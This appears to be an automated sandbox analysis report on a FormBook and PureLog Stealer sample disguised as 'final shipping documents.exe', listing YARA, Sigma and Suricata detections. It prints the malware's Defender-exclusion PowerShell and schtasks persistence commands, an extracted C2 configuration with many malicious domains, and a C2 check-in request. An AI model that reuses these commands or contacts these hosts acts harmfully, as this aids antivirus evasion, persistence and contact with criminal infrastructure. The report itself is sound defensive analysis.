Process Memory Space: GcrdXwPgmZ.exe PID: 6664	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x18fbf:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: mstsc.exe PID: 7468	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x362fd:$a1: 3C 30 50 4F 53 54 74 09 40 0x3a4b1:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d3deb:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: NETSTAT.EXE PID: 7592	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xf92a0:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 45 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.final shipping documents.exe.30b1678.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.final shipping documents.exe.6fe0000.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.MSBuild.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.2.MSBuild.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
9.2.MSBuild.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
9.2.MSBuild.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1aae7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1baea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.2.MSBuild.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a09:$sqlite3step: 68 34 1C 7B E1 0x17b1c:$sqlite3step: 68 34 1C 7B E1 0x17a38:$sqlite3text: 68 38 2A 90 C5 0x17b5d:$sqlite3text: 68 38 2A 90 C5 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
0.2.final shipping documents.exe.6fe0000.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.GcrdXwPgmZ.exe.2da160c.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.GcrdXwPgmZ.exe.2da160c.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.final shipping documents.exe.30b1678.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.MSBuild.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.2.MSBuild.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
9.2.MSBuild.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
9.2.MSBuild.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.2.MSBuild.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
0.2.final shipping documents.exe.2e8f86c.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.GcrdXwPgmZ.exe.2b7f800.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 13 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\final shipping documents.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\final shipping documents.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\final shipping documents.exe", ParentImage: C:\Users\user\Desktop\final shipping documents.exe, ParentProcessId: 3628, ParentProcessName: final shipping documents.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\final shipping documents.exe", ProcessId: 4944, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GcrdXwPgmZ" /XML "C:\Users\user\AppData\Local\Temp\tmpA2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GcrdXwPgmZ" /XML "C:\Users\user\AppData\Local\Temp\tmpA2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe, ParentImage: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe, ParentProcessId: 6664, ParentProcessName: GcrdXwPgmZ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GcrdXwPgmZ" /XML "C:\Users\user\AppData\Local\Temp\tmpA2.tmp", ProcessId: 7392, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GcrdXwPgmZ" /XML "C:\Users\user\AppData\Local\Temp\tmpEBC2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GcrdXwPgmZ" /XML "C:\Users\user\AppData\Local\Temp\tmpEBC2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\final shipping documents.exe", ParentImage: C:\Users\user\Desktop\final shipping documents.exe, ParentProcessId: 3628, ParentProcessName: final shipping documents.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GcrdXwPgmZ" /XML "C:\Users\user\AppData\Local\Temp\tmpEBC2.tmp", ProcessId: 1032, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\final shipping documents.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\final shipping documents.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\final shipping documents.exe", ParentImage: C:\Users\user\Desktop\final shipping documents.exe, ParentProcessId: 3628, ParentProcessName: final shipping documents.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\final shipping documents.exe", ProcessId: 4944, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GcrdXwPgmZ" /XML "C:\Users\user\AppData\Local\Temp\tmpEBC2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GcrdXwPgmZ" /XML "C:\Users\user\AppData\Local\Temp\tmpEBC2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\final shipping documents.exe", ParentImage: C:\Users\user\Desktop\final shipping documents.exe, ParentProcessId: 3628, ParentProcessName: final shipping documents.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GcrdXwPgmZ" /XML "C:\Users\user\AppData\Local\Temp\tmpEBC2.tmp", ProcessId: 1032, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T16:38:40.159985+0100	2031453	1	Malware Command and Control Activity Detected	192.168.2.7	49709	185.199.108.153	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.1fuli9902.shop/a03d/www.oonlightshadow.shop	Avira URL Cloud: Label: malware
Source: http://www.aja168e.live/a03d/www.voyagu.info	Avira URL Cloud: Label: malware
Source: http://www.orld-visa-center.online/a03d/	Avira URL Cloud: Label: malware
Source: http://www.5970.pizza/a03d/	Avira URL Cloud: Label: malware
Source: http://www.avid-hildebrand.info/a03d/	Avira URL Cloud: Label: malware
Source: http://www.lsaadmart.store/a03d/www.duxrib.xyz	Avira URL Cloud: Label: malware
Source: http://www.ategorie-polecane-831.buzz/a03d/www.yselection.xyz	Avira URL Cloud: Label: malware
Source: http://www.eepvid.xyz/a03d/www.atidiri.fun	Avira URL Cloud: Label: malware
Source: www.enelog.xyz/a03d/	Avira URL Cloud: Label: malware
Source: http://www.enelog.xyz/a03d/	Avira URL Cloud: Label: malware
Source: http://www.atidiri.fun/a03d/	Avira URL Cloud: Label: malware
Source: http://www.avid-hildebrand.info/a03d/www.enelog.xyz	Avira URL Cloud: Label: malware
Source: http://www.otelhafnia.info/a03d/	Avira URL Cloud: Label: malware
Source: http://www.romatografia.online/a03d/www.ome-renovation-86342.bond	Avira URL Cloud: Label: malware
Source: http://www.voyagu.info/a03d/www.orld-visa-center.online	Avira URL Cloud: Label: malware
Source: http://www.agfov4u.xyz/a03d/	Avira URL Cloud: Label: malware
Source: http://www.argloscaremedia.info/a03d/	Avira URL Cloud: Label: malware
Source: http://www.enelog.xyz/a03d/www.lsaadmart.store	Avira URL Cloud: Label: malware
Source: http://www.erpangina-treatment-views.sbs/a03d/www.ings-hu-13.today	Avira URL Cloud: Label: malware
Source: http://www.alata.xyz/a03d/	Avira URL Cloud: Label: malware
Source: http://www.kkkk.shop	Avira URL Cloud: Label: malware
Source: http://www.enelog.xyz/a03d/www.erpangina-treatment-views.sbs	Avira URL Cloud: Label: malware
Source: http://www.ome-renovation-86342.bond/a03d/	Avira URL Cloud: Label: malware
Source: http://www.romatografia.online/a03d/	Avira URL Cloud: Label: malware
Source: http://www.ome-renovation-86342.bond/a03d/www.ategorie-polecane-831.buzz	Avira URL Cloud: Label: malware
Source: http://www.5970.pizza/a03d/www.eepvid.xyz	Avira URL Cloud: Label: malware
Source: http://www.ings-hu-13.today/a03d/	Avira URL Cloud: Label: malware
Source: http://www.kkkk.shop/a03d/	Avira URL Cloud: Label: malware
Source: http://www.eepvid.xyz/a03d/www.alata.xyz	Avira URL Cloud: Label: malware
Source: http://www.alata.xyz/a03d/www.enelog.xyz	Avira URL Cloud: Label: malware
Source: http://www.agfov4u.xyz/a03d/www.leurdivin.online	Avira URL Cloud: Label: malware
Source: http://www.encortex.beauty/a03d/	Avira URL Cloud: Label: malware
Source: http://www.voyagu.info/a03d/	Avira URL Cloud: Label: malware
Source: http://www.otelhafnia.info/a03d/www.kkkk.shop	Avira URL Cloud: Label: malware
Source: http://www.ings-hu-13.today/a03d/www.agfov4u.xyz	Avira URL Cloud: Label: malware
Source: http://www.duxrib.xyz/a03d/	Avira URL Cloud: Label: malware
Source: http://www.atidiri.fun/a03d/www.elnqdjc.shop	Avira URL Cloud: Label: malware
Source: http://www.leurdivin.online/a03d/www.romatografia.online	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.enelog.xyz/a03d/"], "decoy": ["nfluencer-marketing-13524.bond", "cebepu.info", "lphatechblog.xyz", "haoyun.website", "itiz.xyz", "orld-visa-center.online", "si.art", "alata.xyz", "mmarketing.xyz", "elnqdjc.shop", "ensentoto.cloud", "voyagu.info", "onvert.today", "1fuli9902.shop", "otelhafnia.info", "rumpchiefofstaff.store", "urvivalflashlights.shop", "0090.pizza", "ings-hu-13.today", "oliticalpatriot.net", "5970.pizza", "arimatch-in.legal", "eepvid.xyz", "bfootball.net", "otorcycle-loans-19502.bond", "nline-advertising-34790.bond", "behm.info", "aportsystems.store", "agiararoma.net", "agfov4u.xyz", "9769.mobi", "ome-renovation-86342.bond", "kkkk.shop", "duxrib.xyz", "xurobo.info", "leurdivin.online", "ive-neurozoom.store", "ndogaming.online", "dj1.lat", "yselection.xyz", "52628.xyz", "lsaadmart.store", "oftware-download-92806.bond", "avid-hildebrand.info", "orashrine.store", "erpangina-treatment-views.sbs", "ategorie-polecane-831.buzz", "oonlightshadow.shop", "istromarmitaria.online", "gmgslzdc.sbs", "asglobalaz.shop", "locarry.store", "eleefmestreech.online", "inggraphic.pro", "atidiri.fun", "olourclubbet.shop", "eatbox.store", "romatografia.online", "encortex.beauty", "8oosnny.xyz", "72266.vip", "aja168e.live", "fath.shop", "argloscaremedia.info"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe

ReversingLabs: Detection: 42%

Multi AV Scanner detection for submitted file

Source: final shipping documents.exe	Virustotal: Detection: 51%			Perma Link
Source: final shipping documents.exe	ReversingLabs: Detection: 42%

Yara detected FormBook

Source: Yara match	File source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2972448445.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2791031634.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1505929112.0000000003CD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1572083824.0000000003BE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1649367924.00000000024E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2972399366.0000000004C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1505929112.0000000003EF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: final shipping documents.exe

Joe Sandbox ML: detected

Source: final shipping documents.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: final shipping documents.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: netstat.pdbGCTL source: MSBuild.exe, 0000000F.00000002.1649082152.0000000000C07000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.1648460267.0000000000A90000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000013.00000002.1649299265.00000000004D0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: netstat.pdb source: MSBuild.exe, 0000000F.00000002.1649082152.0000000000C07000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.1648460267.0000000000A90000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000013.00000002.1649299265.00000000004D0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: explorer.exe, 0000000A.00000002.2477562239.00000000112AF000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000010.00000002.2933557794.0000000003296000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000010.00000002.2973345402.00000000053FF000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001A.00000002.3126911212.0000000009ECF000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000010.00000003.1561959030.0000000004B58000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000010.00000002.2972759000.000000000504E000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000010.00000002.2972759000.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000010.00000003.1564305644.0000000004D03000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000013.00000003.1643226406.0000000002A23000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000013.00000003.1635506917.00000000027FC000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000013.00000002.1650033878.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000013.00000002.1650033878.0000000002D6E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000010.00000003.1561959030.0000000004B58000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000010.00000002.2972759000.000000000504E000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000010.00000002.2972759000.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000010.00000003.1564305644.0000000004D03000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000013.00000003.1643226406.0000000002A23000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000013.00000003.1635506917.00000000027FC000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000013.00000002.1650033878.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000013.00000002.1650033878.0000000002D6E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: mstsc.pdbGCTL source: MSBuild.exe, 00000009.00000002.1564565124.0000000003790000.00000040.10000000.00040000.00000000.sdmp, mstsc.exe, 00000010.00000002.2827077225.0000000000F70000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: mstsc.pdb source: MSBuild.exe, 00000009.00000002.1564565124.0000000003790000.00000040.10000000.00040000.00000000.sdmp, mstsc.exe, 00000010.00000002.2827077225.0000000000F70000.00000040.80000000.00040000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 4x nop then pop ebx

9_2_00407B1E

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49709 -> 185.199.108.153:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49709 -> 185.199.108.153:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49709 -> 185.199.108.153:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Network Connect: 185.199.108.153 80

Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.enelog.xyz/a03d/

Performs DNS queries to domains with low reputation

Source:

DNS query: www.mmarketing.xyz

Uses netstat to query active network connections and open ports

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"

Source: global traffic

HTTP traffic detected: GET /a03d/?GVCX=7n-XjdYXVLzpCFJP&kr40vv8=M9yuS0Q/zm5t8U3StSAeK3d/0GWzO6hCIAE2yJAL2S9lxfaLnLN+cxCn4w5s49jkAk0rpllKuQ== HTTP/1.1Host: www.haoyun.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 185.199.108.153 185.199.108.153
Source: Joe Sandbox View	IP Address: 185.199.108.153 185.199.108.153

Source: Joe Sandbox View

ASN Name: FASTLYUS FASTLYUS

Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45

Source: C:\Windows\explorer.exe

Code function: 10_2_0E592F82 getaddrinfo,setsockopt,recv,

10_2_0E592F82

Source: global traffic

Source: global traffic	DNS traffic detected: DNS query: www.haoyun.website
Source: global traffic	DNS traffic detected: DNS query: www.mmarketing.xyz
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: www.avid-hildebrand.info

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 4248Server: GitHub.comContent-Type: text/html; charset=utf-8Access-Control-Allow-Origin: *ETag: "66974bb1-1098"x-proxy-cache: MISSX-GitHub-Request-Id: ED69:32EBA6:FDF93E:11ACEE1:67867976Accept-Ranges: bytesAge: 2954Date: Tue, 14 Jan 2025 15:38:40 GMTVia: 1.1 varnishX-Served-By: cache-ewr-kewr1740031-EWRX-Cache: HITX-Cache-Hits: 0X-Timer: S1736869120.114303,VS0,VE1Vary: Accept-EncodingX-Fastly-Request-ID: 3bbfb139f28e179dc9aea2674997ca6044c1fd13

Source: explorer.exe, 0000000A.00000000.1505638874.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2462603390.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271435377.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2465635180.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2273498189.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3123251512.0000000009336000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009336000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
